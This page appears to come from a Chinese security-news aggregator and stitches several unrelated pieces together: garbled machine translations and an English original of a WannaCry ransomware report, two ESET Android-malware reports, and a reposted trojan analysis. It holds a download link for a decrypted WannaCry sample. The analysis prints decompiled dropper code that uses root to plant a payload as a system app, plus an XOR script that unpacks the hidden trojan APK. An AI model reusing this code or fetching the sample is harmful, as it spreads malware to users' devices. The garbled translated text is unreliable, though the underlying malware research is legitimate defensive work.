WannaCry ransomware hit Windows computers worldwide HACKERSCHINA NEWS 4黑色星期五:大规模的勒索攻击以打击全球系统的想哭计算机病毒,“勒索者永恒之蓝”

一个巨大的恶意勒索攻击星期五的头条,首先针对英国医院和西班牙银行在世界范围内迅速蔓延。这个消息是由西班牙电信公司Telefónicaó及时确认,其中的勒索攻击的众多受害者。报纸El Pais报道大量的攻击而在西班牙,ó电信专家确认在其内部的系统已经被病毒感染,增加的情况下的控制。固定和移动电话服务的电话óNICA不被攻击勒索的影响。

西班牙CERT发出一种警告的组织和确认的恶意软件正在迅速蔓延。

《勒索、巴克什想哭(aka Wcry,WanaCrypt,wannacrypt),有针对性的其他许多公司在西班牙和世界各地,包括沃达丰,联邦,和其他关键基础设施。

El Reg报道6 NHS健康信托在英国被恶意软件了。根据Theresa May总理“勒索”削弱了“英国医院、政府代表也证实,情况是由情报机构GCHQ的监控。

NHS面临由于其IT基础设施的陈旧性,还包括大量的运行Windows XP系统的严重问题。

“电脑被锁在Aintree、布莱克浦、埃塞克斯郡布鲁姆菲尔德医院,科尔切斯特总医院,在Derbyshire,大雅茅斯所有的医院系统,东、北赫特福德郡,James Paget Hospital在Norfolk,Lanarkshire,和莱斯特。”报道,埃尔条。

图1–计算机的勒索软件感染想哭

专家从Avast检测安全公司更多超过75000的攻击在99个国家中,大多数的感染的观察在俄罗斯,乌克兰,台湾。

一个实时地图的感染可在以下地址:

https://intel.malwaretech.com/botnet/wcrypt/?t=5m&bid=all

图2–实时感染地图

来源ArsTechnica

一个勒索,利用国家安全局eternalblue和doublepulsar战功

想哭的勒索,利用两NSA利用eternalbluedoublepulsar感染计算机和传播到任何另一个连接Windows系统的威胁,在同一个网络。

从卡巴斯基实验室的研究人员已经证实,想哭”攻击是通过一个smbv2远程执行代码在微软Windows启动。

“重要的是要明白,而未打补丁的Windows计算机暴露他们的SMB服务可以远程攻击的“eternalblue”开发的勒索软件感染的想哭,这个漏洞也存在不足不能防止勒索软件组件的工作。不过,这个漏洞的存在是引起爆发的最重要因素,”卡巴斯基的分析报告

专家强调,网络温暖的能力,允许恶意代码传播迅速。

“这项运动的特殊性是通过利用漏洞公告ms17-010使用描述引起的eternalblue/doublepulsar,可感染其他连接的Windows系统上是不正确的更新相同的网络。一台计算机感染最终会影响整个企业的网络。”国家的西班牙语证书发出安全警报

“勒索,想哭的一个变种,感染机通过加密所有文件,使用前一段允许执行远程命令通过Samba提到的漏洞(SMB),在相同的网络分布到其他Windows机器。”

的doublepulsar后门,允许攻击者注入并执行在目标系统上安装恶意代码;它是利用eternalblue,一个smbv1(服务器消息块1)开发这可能导致在旧版本的Windows的RCE(Windows XP Server 2008 R2)。

想哭的勒索利差通过SMB,它加密的文件在被感染的机器和收费300美元或600美元的比特币恢复。

勒索软件可以加密各种文件在受感染的机器,它也攻击存储在任何附加存储的文件,并把远程桌面访问任何键。恶意软件删除卷快照和禁用修复工具系统将不可能恢复文件。

专家观察恶意软件确定受害者的语言在正确的语言显示赎金要求

在思科塔洛斯团队安全专家已经在想哭勒索公布详细的分析。

在分析出版的专家在该研究小组描述了完整的感染过程如下:

“初始文件和执行文件tasksche.exe mssecsvc.exe滴。杀死开关领域进行检查。其次,服务mssecsvc2.0创建。该服务执行文件mssecsvc.exe比初始执行不同的切入点。本次执法检查被感染的机器,并试图连接到同一子网中的每个IP地址的445端口的TCP IP地址。当恶意软件成功地连接到机器上,启动连接和数据传输。我们相信这是一个利用网络流量负载。它已被广泛报道这是利用最近披露的解决微软在公告的漏洞ms17 – 010。我们目前没有一个完整的理解的SMB流量,到底需要什么条件是它使用这种方法传播。”状态的分析。

“磁盘驱动器上的文件tasksche.exe检查,包括网络共享和移动存储设备映射到一个字母,如“C:”,“/”D:等恶意软件然后检查一个文件扩展名为附录中所列的文件加密使用2048位RSA加密。当文件被加密,恶意软件创建一个新文件目录“Tor”到它下降的tor.exe九DLL文件使用的tor.exe。此外,它滴两个文件:taskdl.exe和taskse.exe。前者删除临时文件,后者推出“wanadecryptor @。exe桌面上向最终用户显示的赎金。“wanadecryptor @ .exe的本身并不是勒索赎金,只。加密是通过tasksche在后台进行。exe”。

专家分析,希望能找到想哭勒索样品在GitHub库:

https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

该页包含有用的信息,如恶意软件的比特币钱包地址。

勒索指导受害者到一个页面,在btcfrog显示一个QR码,它链接到攻击者的主要的比特币钱包13am4vw2dhxygxeqepohkhsquy6ngaeb94

图3–支付页面显示的QR码

下面的威胁的关键发现:

  • 病毒名称:wannacrypt,想哭,wanacrypt0r,WCrypt,wcry
  • 矢量:如果不打补丁ms-17-010所有Windows版本的Windows 10之前是脆弱的。它采用eternalblue ms17-010传播。
  • 赎金:300美元到600美元之间。有码RM(删除)在病毒文件。似乎复位如果病毒崩溃。
  • 留后门:蠕虫的循环通过系统上的每个RDP会话运行勒索用户。它还安装了doublepulsar后门。它被阴影使回收难。(来源:Malwarebytes)
  • 杀死开关:如果网站www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com是病毒的存在而感染宿主。(来源:Malwarebytes)。这一领域已sinkholed,阻止蠕虫的传播。

解密样品的想哭勒索是可用的在这里

HTTPS:/ / / / cyber1be0b96d502c268cb40da97a16952d89674a9329cb60bac81a96e01cf7356830.exe zhnxr transfer.sh

杀死开关

在大规模攻击的安全专家开始他们的恶意代码分析的野外恶意软件样本的逆向工程几小时后。好消息是,从第一次调查的恶意软件研究人员已经发现了一种杀死开关的勒索软件代码,条件可以阻止代码的执行,当匹配。

道德黑客培训–资源(信息安全)

图4–Kevin Beaumont Tweet杀死开关

英国专家malwaretechblog已经注册了域名后,他们做了一个代码的逆向工程。

杀死开关领域iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com;域名sinkholed执法。在加利福尼亚的一个服务器,和管理员的受感染的系统达到了.com将会收到通知,告诉我们。“从我们的天坑的IP地址已被送往联邦调查局。

图5–杀死开关领域

下面显示当机器试图连接它的消息:

“从我们的天坑的IP地址已被送往联邦调查局和Shadowserver因此受影响的组织应该很快就会得到一个通知,”研究者。信息安全体承认他们注册了域名,然后意识到这是一个总开关。不过,工作了。”

从思科战专家的想哭勒索一个有趣的分析。

“想哭似乎并不只是利用这种攻击框架相关的eternalblue模块;它仅仅是对doublepulsar存在后门扫描服务器。在情况下,它标识一个主机,已经与这个后门植入,它只是利用现有的后门功能,用它来感染系统的想哭”读分析来自Talos。“如果系统尚未被植入doublepulsar,恶意软件将使用eternalblue的SMB漏洞的初步开发。这是蠕虫样活性,已被广泛观察到整个互联网的原因。”

微软已经发布了一个安全顾问对威胁和急救补丁WindowsXP

IT巨头发布急救安全补丁的Windows Server 2003(SP2 x64和x86);Windows XP(SP2 SP3 x64,x86);Windows XP Embedded(SP3,x86);以及Windows 8位和64位版本。

结论

以下几个方面对大规模的勒索攻击必须仔细考虑:

  • 这种攻击演示相关的风险militarization的网络空间。恶意软件,利用代码和黑客工具的情报机构和政府发展是很危险的,失去控制。
  • 该恶意软件的成功是由于那些没有意识到威胁的受害者错误的安全态势,并没有应用安全补丁,微软发布的。
  • 现代的关键基础设施的网络攻击是没有弹性的。
  • WannaCry ransomware hit Windows computers worldwide

    A massive malicious ransomware-based attack made the headlines on Friday, first targeting UK hospitals and Spanish banks before rapidly spreading worldwide. The news was promptly confirmed by the Spanish Telco companies Telefónica, one of the numerous victims of the ransomware attack. The newspaper El Pais also reportedthe massive attack, while experts at Telefónicaconfirmedthe systems in its intranet had been infected, adding that the situation was under control. The fixed and mobile telephone services provided by Telefónica were not been affected by the ransomware-based attack.

    The Spanish CERT issued an alert warning the organizations and confirmed that the malware was rapidly spreading.

    The ransomware, dubbedWannaCry(aka Wcry, WanaCrypt, WannaCrypt), targeted many other companies in Spain and across the world, including Vodafone, FedEx, and other critical infrastructure.

    El Reg reported that 6 NHS health trusts in the UK were taken out by the malware. According to Prime Minister Theresa May, the ransomware “has crippled” UK hospitals, the Government representative also confirmed that the situation was monitored by the intelligence agency GCHQ.

    The NHS faced serious problems due to the antiquated nature of its IT infrastructure that still includes a large number of systems running Windows XP systems.

    “Computers were locked in Aintree, Blackpool, Broomfield Hospital in Essex, Colchester General Hospital, all hospital systems in Derbyshire, Great Yarmouth, East and North Hertfordshire, James Paget Hospital in Norfolk, Lanarkshire, and Leicester.” Reported El Reg.

    Figure 1 – A computer infected by the WannaCry ransomware

    Experts from the security firm Avast detected morethan 75,000 attacksin 99 countries, most of the infections were observed in Russia, Ukraine, and Taiwan.

    A real-time map of the infections is available at the following address:

    https://intel.malwaretech.com/botnet/wcrypt/?t=5m&bid=all

    Figure 2 – Real Time Infections Map

    SourceArstechnica

    A Ransomware that leverages the NSA EternalBlue and DoublePulsar exploits

    The WannaCry ransomware exploits the two NSA exploitsEternalBlueandDoublePulsarto infect computers and propagate the threat to any another connected Windows systems on the same network.

    Researchers from Kaspersky Lab have confirmed that the WannaCry” attack is initiated through an SMBv2 remote code execution in Microsoft Windows.

    “It is important to understand that while unpatched Windows computers exposing their SMB services can be remotely attacked with the “EternalBlue” exploit and infected by the WannaCry ransomware, the lack of existence of this vulnerability doesn’t really prevent the ransomware component from working. Nevertheless, the presence of this vulnerability appears to be the most significant factor that caused the outbreak,” reported the analysis from Kaspersky

    Experts highlighted the network warm capabilities that allow the malicious code to spread rapidly.

    “The special criticality of this campaign is caused by exploiting the vulnerability described in bulletin MS17-010 usingEternalBlue/DoublePulsar, which can infect other connected Windows systems on the same network that are not properly updated. Infection of a single computer can end up compromising the entire corporate network.” states the security alert issued by the Spanish CERT.

    “The ransomware, a variant of WannaCry, infects the machine by encrypting all its files and, using the vulnerability mentioned in the previous paragraph that allows the execution of remote commands through Samba (SMB) and is distributed to other Windows machines in That same network.”

    The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system; it is installed by leveraging theETERNALBLUE, an SMBv1 (Server Message Block 1.0)exploitthat could trigger an RCE in older versions of Windows (Windows XP to Server 2008 R2).

    The WannaCry ransomware spreads via SMB, it encrypts the files on the infected machines and charges $300 or $600 in Bitcoin to restore them.

    The ransomware can encrypt a wide variety of documents on the infected machines, it also attacks documents stored on any attached storage, and snatches any keys for remote desktop access. The malware deletes volume snapshots and disables system repair tools to make impossible recovery files.

    Experts observed the malware determine the victim’s language to display a ransom demand in the correct language

    Security experts at CISCO Talos team have published a detailed analysis on the WannaCry ransomware.

    Below the complete infection process described in the analysis published by the experts at the Talos team:

    “An initial file mssecsvc.exe drops and executes the file tasksche.exe. The kill switch domain is then checked. Next, the service mssecsvc2.0 is created. This service executes the file mssecsvc.exe with a different entry point than the initial execution. This second execution checks the IP address of the infected machine and attempts to connect to port 445 TCP of each IP address in the same subnet. When the malware successfully connects to a machine, a connection is initiated, and data is transferred. We believe this network traffic is an exploit payload. It has been widelyreportedthis is exploiting recently disclosed vulnerabilities addressed by Microsoft in bulletinMS17-010. We currently don’t have a complete understanding of the SMB traffic, and exactly what conditions need to be present for it to spread using this method.” states the analysis.

    “The file tasksche.exe checks for disk drives, including network shares and removable storage devices mapped to a letter, such as ‘C:/’, ‘D:/’ etc. The malware then checks for files with a file extension as listed in the appendix and encrypts these using 2048-bit RSA encryption. While the files are being encrypted, the malware creates a new file directory ‘Tor/’ into which it drops tor.exe and nine dll files used by tor.exe. Additionally, it drops two further files: taskdl.exe & taskse.exe. The former deletes temporary files while the latter launches @wanadecryptor@.exe to display the ransom note on the desktop to the end user. The @wanadecryptor@.exe is not in and of itself the ransomware, only the ransom note. The encryption is performed in the background by tasksche.exe.”

    Experts that want to analyze the WannaCry ransomware can findsampleson the following GitHub repository:

    https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

    the page includes useful information such as the addresses of Bitcoin wallets for the malware.

    The ransomwaredirectsvictims to a page with displaying a QR code at btcfrog, which links to attacker main bitcoin wallet13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94.

    Figure 3 – Payment Page displays QR code

    Below Key findings of the threat:

    • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
    • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
    • Ransom: between $300 to $600. There is code to ‘rm’ (delete) files in the virus. Seems to reset if the virus crashes.
    • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: Malwarebytes)
    • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: Malwarebytes). This domain has been sinkholed, stopping the spread of the worm.

    A decrypted sample of the WannaCry ransomware is availablehere:

    https://transfer.sh/ZhnxR/CYBER1be0b96d502c268cb40da97a16952d89674a9329cb60bac81a96e01cf7356830.EXE

    The Kill Switch

    A few hours after the massive attacks security experts started their analysis of the malicious code after a reverse engineering of the samples of the malware available in the wild. The good news emerged from the first investigation is that malware researchers have discovered a kill switch in the ransomware code, a condition that could halt the execution of the code when matched.

    ETHICAL HACKING TRAINING – RESOURCES (INFOSEC)

    Figure 4 – Kevin Beaumont Tweet about the kill switch

    The UK experts atMalwareTechBloghave registered the domain after they made a reverse engineering of the code.

    The Kill Switch domain is iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com; the domain was sinkholed by law enforcement. To a server in California, and the admins of the infected systems reaching out to the dot-com will be notified, we are told. “IP addresses from our sinkhole have been sent to FBI.

    Figure 5 – Kill Switch domain

    Below the messages displayed when a machine tries to connect it:

    “IP addresses from our sinkhole have been sent to FBI andShadowServerso affected organizations should get a notification soon,”saidthe researcher. The InfoSec bodyadmittedthey registered the domain first, then realized it was a kill switch. Still, job done.”

    Experts from CISCO Talos group made an interesting analysis of the WannaCry ransomware.

    “WannaCry does not appear to only be leveraging the ETERNALBLUE modules associated with this attack framework; it is simply scanning accessible servers for the presence of the DOUBLEPULSAR backdoor. In cases where it identifies a host that has been implanted with this backdoor, it simply leverages the existing backdoor functionality available and uses it to infect the system with WannaCry.” reads theanalysisfrom Talos. ” In cases where the system has not been previously compromised and implanted with DOUBLEPULSAR, the malware will use ETERNALBLUE for the initial exploitation of the SMB vulnerability. This is the cause of the worm-like activity that has been widely observed across the internet.”

    Microsoft has published asecurity advisoryfor the threat and an emergency patch forWindows XP.

    The IT giant released emergency security patches for Windows Server 2003 (SP2 x64 / x86); Windows XP (SP2 x64, SP3 x86); Windows XP Embedded (SP3, x86); as well as the 32-bit and 64-bit versions of Windows 8.

    Conclusions

    The following aspects of the massive ransomware attack must be carefully considered:

    • This attack demonstrates the risks related to themilitarization of the cyberspace. Malware, exploits code and hacking tools developed by intelligence agencies and governments could be very dangerous when out of control.
    • The success of the malware is due to the wrong security posture of the victims that have no awareness of the threat, and that did not apply security patches released by Microsoft.
    • Modern critical infrastructure is not resilient to cyber-attacks

发布的Android恶意软件的源代码,用于运行银行僵尸网络

这个新的Android恶意软件银行最近发现在谷歌Play ESET发现再次在野外,更针对银行。这种表面的威胁进一步调查发现其代码中使用的是公开的几个月前的源代码建立。

检测由ESET作为trojan.android/spy.banker.hu的早期版本(1.1版–的源代码作者标记)和2月6日报道TH。恶意软件是通过谷歌游戏作为一个木马版本的一个合法的天气预报中的应用分布好天气。特洛伊目标22土耳其移动银行应用程序,试图收获凭据使用假冒的登录表单。此外,它可以被感染的设备远程锁定和解锁,以及拦截短信。

上星期日,我们发现在谷歌播放的版本新的木马,伪装成另一个合法的天气应用程序,这个时候世界天气。特洛伊,检测由ESET作为trojan.android/spy.banker.hw(1.2版),可在谷歌Play商店从2月14日TH直到被报道由ESET和拉从2月20日的商店TH

连接点

第二发现导致另一轮的调查,提供了一些有趣的启示。

事实证明,这些都是基于免费的Android木马的源代码是公开的在线。据称,从头写起,Android的恶意软件的“模板”代码,随着C&C服务器–包括Web控制面板–已经在俄罗斯论坛自12月19日以来已可用的代码TH,2016

图1–源代码的Android恶意软件和C & C在俄罗斯论坛公开

随后的调查带来的结果博士网络我们的关注,他们分析了一个恶意软件的早期的变种(由我们系统自12月26日检测TH2016,安卓/间谍。银行家HH)。

然而,这种变异并不直接连接到那些我们在谷歌播放找到,即使我们发现它同样检测名义下,版本1。我们能够确认这获得了僵尸网络的C&C服务器控制面板后,这是启动和运行,在我们调查的时间。通过控制面板,我们能够收集信息关于所有2800感染的僵尸网络恶意软件的版本。

图2–C & C Web控制面板上市的恶意软件的受害者

下面是用户群体受到了恶意软件的概述,基于C和C控制面板中列出的僵尸网络数据:

有趣的是,C&C服务器本身,活动自2017年2月2日以来,已接近谁有网址,无需任何证件。

图3–调查时间表

它是如何运行的呢?

新发现的版本基本上相同的功能作为它的前身。在它的顶部采用了从原来的合法应用天气预报功能,trojan.android/spy.banker.hw能够锁定和解锁被感染的设备远程设置锁屏密码和短信拦截。

两者之间唯一的区别似乎是一个更广泛的目标群体–恶意软件现在影响69英国、奥地利用户,德国和土耳其的银行应用程序的–和更先进的混淆技术。

图4–谷歌恶意APP游戏

图5–绿色–合法世界天气图标;红–恶意版本

该木马还具有一个内置的通知功能,其目的只能验证访问C&C服务器后。原来,该恶意软件能够在受感染的设备显示假通知,提示用户启动一个应用程序在目标银行从各银行的一个“重要信息”的名义。通过这样做,在一个虚假的登录屏幕形式恶意活动触发。

图6–C & C发送伪造的通知消息的受感染的设备

图7–假冒的银行应用程序通知从C&C发送

我的设备被感染了?我怎么清理?

如果你最近从Play商店安装了一个天气应用程序,你可能要检查,如果你没有这一银行木马的受害者。

In case you think you might have downloaded an app named Weather, look for it under Settings -> Application Manger. If you see the app depicted in Fig. 8, and also find “System update” under Settings -> Security -> Device administrators (Fig. 9), your device has been infected.

清洁您的设备,我们建议你向一个移动安全解决方案,或者你可以手动删除恶意软件。

To manually uninstall the trojan, it is first necessary to deactivate its device administrator rights found under Settings -> Security -> System update. With that done, you can uninstall the malicious app in Settings -> Application Manger -> Weather.

图8:在应用程序管理器的木马

图9:恶意软件伪装成有源设备管理员在系统更新

如何保持安全

而这背后的僵尸网络攻击者的特定群体选择传播恶意软件的木马程序通过天气和目标列在文章底部的银行,没有保证的代码不是或不被用在别的地方。

记住,要坚持一些基本的原则来保护移动恶意软件很好。

虽然不是完美无瑕,谷歌Play也采用先进的安全机制,防止恶意软件了。这可能不会与其他应用程序商店或其他来源不明的情况下,选择谷歌官方Play商店尽可能。

而从Play商店下载,确保能在安装或更新知道应用程序的权限。而不是自动给一个应用程序的权限要求,考虑他们的意思是应用程序以及你的设备。如果任何事情了,读什么其他用户写在他们的评论和下载相应的反思。

运行你已经安装在您的移动设备后,请继续关注哪些权限和权利要求。一个应用程序不会运行没有高级权限,没有连接到其预定的功能可能是一个应用程序你不想安装在你的手机上。

最后但并非最不重要的,即使所有的其他方法都失败了,一个有信誉的移动安全解决方案,可以保护您的设备从活跃的威胁。

如果你想了解更多关于Android的恶意软件,看看我们的最新的研究在话题

你也可以阻止由ESET的站在今年的移动世界大会

样品

包的名字搞砸检测
goodish.weatherca2250a787fac7c6eef6158ef48a3b6d52c6bc4bAndroid / spy.banker.hh
goodish.weathera69c9bad3db04d106d92fd82ef4503ea012d0da9Android / spy.banker.hu
follon.weatherf533761a3a67c95dc6733b92b838380695ed1e92Android / spy.banker.hw

有针对性的应用

Android / spy.banker.hh和Android / spy.banker.hu:

com.garanti.cepsubesi
com.garanti.cepbank
com.pozitron.iscep
com.softtech.isbankasi
com.teb
com.akbank.android.apps.akbank _直接
com.akbank.softotp
com.akbank.android.apps.akbank _直接_片剂
com.ykb.androidtablet
com.ykb.android.mobilonay
com.finansbank.mobile.cepsube
finansbank.enpara
com.tmobtech.halkbank
biz.mobinex.android.apps.cep_sifrematik
com.vakifbank.mobile
com.ingbanktr.ingmobil
com.tmob.denizbank
tr.com.sekerbilisim.mbank
com.ziraat.ziraatmobil
com.intertech.mobilemoneytransfer.activity
com.kuveytturk.mobil
com.magiclick.odeabank

Android / spy.banker.hw:

com.garanti.cepsubesi
com.garanti.cepbank
com.pozitron.iscep
com.softtech.isbankasi
com.teb
com.akbank.android.apps.akbank _直接
com.akbank.softotp
com.akbank.android.apps.akbank _直接_片剂
com.ykb.android
com.ykb.androidtablet
com.ykb.android.mobilonay
com.finansbank.mobile.cepsube
finansbank.enpara
com.tmobtech.halkbank
biz.mobinex.android.apps.cep_sifrematik
com.vakifbank.mobile
com.ingbanktr.ingmobil
com.tmob.denizbank
tr.com.sekerbilisim.mbank
com.ziraat.ziraatmobil
com.intertech.mobilemoneytransfer.activity
com.kuveytturk.mobil
com.magiclick.odeabank
com.isis _ papyrus.raiffeisen _付费的_ eyewdg
at.spardat.netbanking
at.bawag.mbanking
at.volksbank.volksbankmobile
com.bankaustria.android.olb
at.easybank.mbanking
com.starfinanz.smob.android.sfinanzstatus
com.starfinanz.smob.android.sbanking
de.fiducia.smartphone.android.banking.vr
com.db.mm.deutschebank
de.postbank.finanzassistent
de.commerzbanking.mobil
com.ing.diba.mbbr2
de.ing_diba.kontostand
de.dkb.portalapp
com.starfinanz.mobile.android.dkbpushtan
de.consorsbank
de.comdirect.android
mobile.santander.de
de.adesso.mobile.android.gad
com.grppl.android.shell.bos
uk.co.bankofscotland.businessbank
com.barclays.android.barclaysmobilebanking
com.barclays.bca
com.ie.capitalone.uk
com.monitise.client.android.clydesdale
com.monitise.coop
uk.co.northernbank.android.tribank
com.firstdirect.bankingonthego
com.grppl.android.shell.halifax
com.htsu.hsbcpersonalbanking
com.hsbc.hsbcukcmb
com.grppl.android.shell.cmblloydstsb73
com.lloydsbank.businessmobile
uk.co.metrobankonline.personal.mobile
co.uk.nationwide.mobile
com.rbs.mobile.android.natwest
com.rbs.mobile.android.natwestbandc
com.rbs.mobile.android.rbsm
com.rbs.mobile.android.rbsbandc
uk.co.santander.santanderuk
uk.co.santander.businessuk.bb
com.tescobank.mobile
uk.co.tsb.mobilebank
com.rbs.mobile.android.ubn
com.monitise.client.android.yorkshire

中国骇客提醒您近期Android木马猖狂模仿用户点击下载危险的恶意软件

Android用户已经接触到一个新的恶意程序模仿Adobe Flash Player作为多种危险的恶意软件的一个潜在的入口。的应用,检测由ESET安全软件为Android / trojandownloader.agent.ji,花样其受害者给予它在Android访问菜单特殊权限和使用这些下载并执行攻击者选择额外的恶意软件。

根据我们的分析,该木马的目标设备上运行Android,包括最新的版本。它是通过入侵网站–成人视频网站的分布,但也通过社会媒体。安全措施的借口下,网站引诱用户下载一个假的Adobe Flash Player更新。如果受害者属于合法寻找更新屏幕,运行安装,他们有更多的欺骗性的屏幕期待。

图1:假冒的Flash Player更新屏幕

那怎么使用呢?

下一个虚假的屏幕弹出以下安装成功,声称“太耗能量”并要求用户打开一个假的“节省电池”的模式。像大多数恶意弹出窗口,消息不会停止,直到受害者出现了并同意启用服务。这将打开Android访问菜单、列表显示服务可及性功能。合法的中,一个新的服务(在安装期间创建的恶意软件)命名为“节省电池”出现。然后服务请求的权限监控你的行动检索窗口内容打开通过触摸来探索–所有关键的未来的恶意行为,使攻击者模仿用户的点击和选择显示在屏幕上的任何事。

图2:弹出屏幕要求“节约电池”安装后

图3:辅助功能菜单与Android恶意服务

图3:辅助功能菜单与Android恶意服务

一旦服务启用,假冒的Flash播放器图标隐藏用户。然而,在这种背景下,恶意软件正忙着联系C&C服务器和它提供的关于妥协的设备信息。服务器URL导致检测的情况下,网络罪犯的选择–恶意应用程序响应,银行恶意软件(虽然它可以是任何的恶意软件包括广告软件通过间谍软件,并对勒索)。获取恶意链接后,受损的设备显示一个虚假的锁屏不能选择关闭它,包括正在进行的恶意活动下。

图5:锁屏覆盖恶意活动

这是当允许模仿用户的点击就派上用场了–恶意软件现在是免费下载,安装,执行并激活额外的恶意软件的设备管理员权限,在用户不知情的情况下,却依然看不见假锁屏下。在应用程序的秘密把戏完成,覆盖屏幕消失,用户可以继续使用移动设备–现在被下载的恶意软件。

我的设备被感染了?我怎么清理?

如果你认为你可能有过去安装这个假冒的Flash播放器的更新,你可以很容易地通过检查储蓄电池在辅助菜单验证服务。如果上市的服务,您的设备很可能被感染。

拒绝服务的权限只会带你回到第一个弹出屏幕并不会摆脱Android / trojandownloader.agent.ji。

To remove the downloader, try manually uninstalling the app from Settings -> Application Manager -> Flash-Player.

In some instances, the downloader also requests that the user activate Device administrator rights. If that turns out to be the case and you can’t uninstall the app, deactivate the administrator rights by going to Settings -> Security -> Flash-Player and then proceed with uninstalling.

即使这样,你的设备可能仍然是由无数的恶意程序通过下载安装感染。确保你的设备是干净的,我们建议使用一个有信誉的移动安全应用程序作为一种轻松的方法来检测和消除威胁。

如何保持安全

为了避免处理讨厌的移动恶意软件的后果,预防是关键。除了坚持值得信赖的网站,有更多的事情可以做,以保持安全。

如果你在你的浏览器下载的应用程序或更新,经常检查URL地址来确定你打算从源码安装。在这种特殊情况下,得到您的Adobe Flash Player更新唯一安全的地方是从Adobe官方网站。

运行你已经安装在您的移动设备后,注意哪些权限和权利要求。如果一个应用程序请求的权限,似乎不适合它的功能,不使这些没有仔细检查。

最后但并非最不重要的,即使所有的其他方法都失败了,一个有信誉的移动安全解决方案,可以保护您的设备从活跃的威胁。

如果你想了解更多关于Android的恶意软件,看看我们的最新的研究在话题。你也可以阻止由ESET的站在今年的移动世界大会

从被感染的设备视频采集(时间编辑)

视频片段(截取自被感染的设备)

http://www.welivesecurity.com/2017/02/14/new-android-trojan-mimics-user-clicks-download-dangerous-malware/

分析示例

Package NameHashDetection name
loader.com.loader4F086B56C98257D6AFD27F04C5C52A48C03E9D62Android/TrojanDownloader.Agent.JI
cosmetiq.flC6A72B78A28CE14E992189322BE74139AEF2B463Android/Spy.Banker.HD

[转载] Android 木马远控1.3(完整免杀进程植入版)

 

工具

ApkTool、dex2jar、DJ Java Decompiler分析必备

python2.6编写解密脚本

分析

这个样本通过捆绑软件SD-Booster来达到感染的目的,在安装运行被感染的SD-Booster时,木马就会自动安装进Android系统,为了尽快找到感染部分,下载未感染的SD-Booster进行反编译对比,结果如图 1所示:

 

图 1

程序被植入了“com.android.md5”与“com.gamex.inset”两个包,首先找到植入程序的加载处,在SDBoost类的onCreate()方法中插入了如下代码:

[Python] 纯文本查看 复制代码

?

1

2

3

4

5

public void onCreate(Bundle paramBundle) {

    super.onCreate(paramBundle);

    A.b(this);

    …

A是“com.gamex.inset”包中的类,A.b()方法代码如下:

[Python] 纯文本查看 复制代码

?

1

2

3

4

5

6

public static void b(Context paramContext)

  {

    context = paramContext;

    Intent localIntent = new Intent(paramContext, Settings.class);

    ComponentName localComponentName = paramContext.startService(localIntent);

  }

直接启动的是Settings.class服务,这个服务很简单,启动代码是这样的:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

public void onStart(Intent paramIntent, int paramInt)

  {

    super.onStart(paramIntent, paramInt);

    new Settings.1(this).start();

  }

class Settings$1 extends Thread

{

  public void run()

  {

    if ((!A.a) && (A.c()) && (A.d(A.context)))

    {

      A.a = 1;

      Settings localSettings = this.this$0;

      new C(localSettings).start();

    }

    while (true)

    {

      return;

      this.this$0.stopSelf();

    }

  }

}

[size=10.5000pt]A.a初始化为0,用来判断木马是否已经运行,A.c()只有一行代码判断SD卡是否已经准备好,为后面的病毒下载做准备,A.d()判断木马程序“com.android.setting”是否已经安装,如果没有安装且满足上面的条件就启动C线程来安装木马,C类的run()方法在Dex2jar中显示不了,在DJ Java Decompiler中可以看到完整的反编译的代码,线程通过context.getAssets().open(“logos.png”)读取木马文件,然后通过解密运算得到最终的apk安装文件,解密代码我用python实现如下:

[Python] 纯文本查看 复制代码

?

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

# -*- coding:utf-8 -*-

import sys

def main(filename):

    infile = file(filename,”rb”)

    outfile = file(filename[:-4]+”.apk”,”wb”)

    while 1:

        c = infile.read(1)

        if not c:

            break

        c = chr(ord(c) ^ 18)

        outfile.write(c)

    outfile.close()

    infile.close()

if __name__ == ‘__main__’:

main(sys.argv[1])

解密只是将整个文件与0x12异或而以,运行“python decrypt_apk.py logos.png”就会生成logos.apk木马文件。在上一步的解密完成后,调用了a(String)方法来安装木马,代码如下:

[mw_shl_code=python,true]protected static void a(String paramString)

  {

    try

    {

      Process localProcess = Runtime.getRuntime().exec(“su”);

      OutputStream localOutputStream = localProcess.getOutputStream();

      DataOutputStream localDataOutputStream = new DataOutputStream(localOutputStream);

      localDataOutputStream.writeBytes(“mount -o remount rw /system \n”);

      String str = “cp -i ” + paramString + ” /system/app/ComAndroidSetting.apk\n”;

      localDataOutputStream.writeBytes(str);

      Thread.sleep(20000L);

      localDataOutputStream.writeBytes(“chmod 644 /system/app/ComAndroidSetting.apk\n”);

      localDataOutputStream.writeBytes(“exit\n”);

      localDataOutputStream.flush();

      int i = localProcess.waitFor();

      return;

    }

    catch (IOException localIOException)

    {

      while (true)

        localIOException.printStackTrace();

    }

    catch (InterruptedException localInterruptedException)

    {

      while (true)

        localInterruptedException.printStackTrace();

    }

  }

邪恶的代码将整个程序复制到了“/system/app/”目录下,使其成为系统程序!在安装完成后运行如下代码来发送广播与停止Settings服务:

        ntent intent = new Intent(“kurhjfngjhfjghdfjgjjdh”);

        context.sendBroadcast(intent);

        Intent intent1 = new Intent(context, com/android/md5/Settings);

        boolean flag3 = context1.stopService(intent1);

[/mw_shl_code]

这个奇怪字符串的广播是用来被木马接收的,到这里捆绑部分的工作做完了,下面是木马真身上场了,将刚才解密出的logos.apk解包,使用dex2jar该干啥干啥后,查看“AndroidManifest.xml”文件发现木马没有界面,并且通过两个开机广播来运行的,如图2所示:

 

图 2

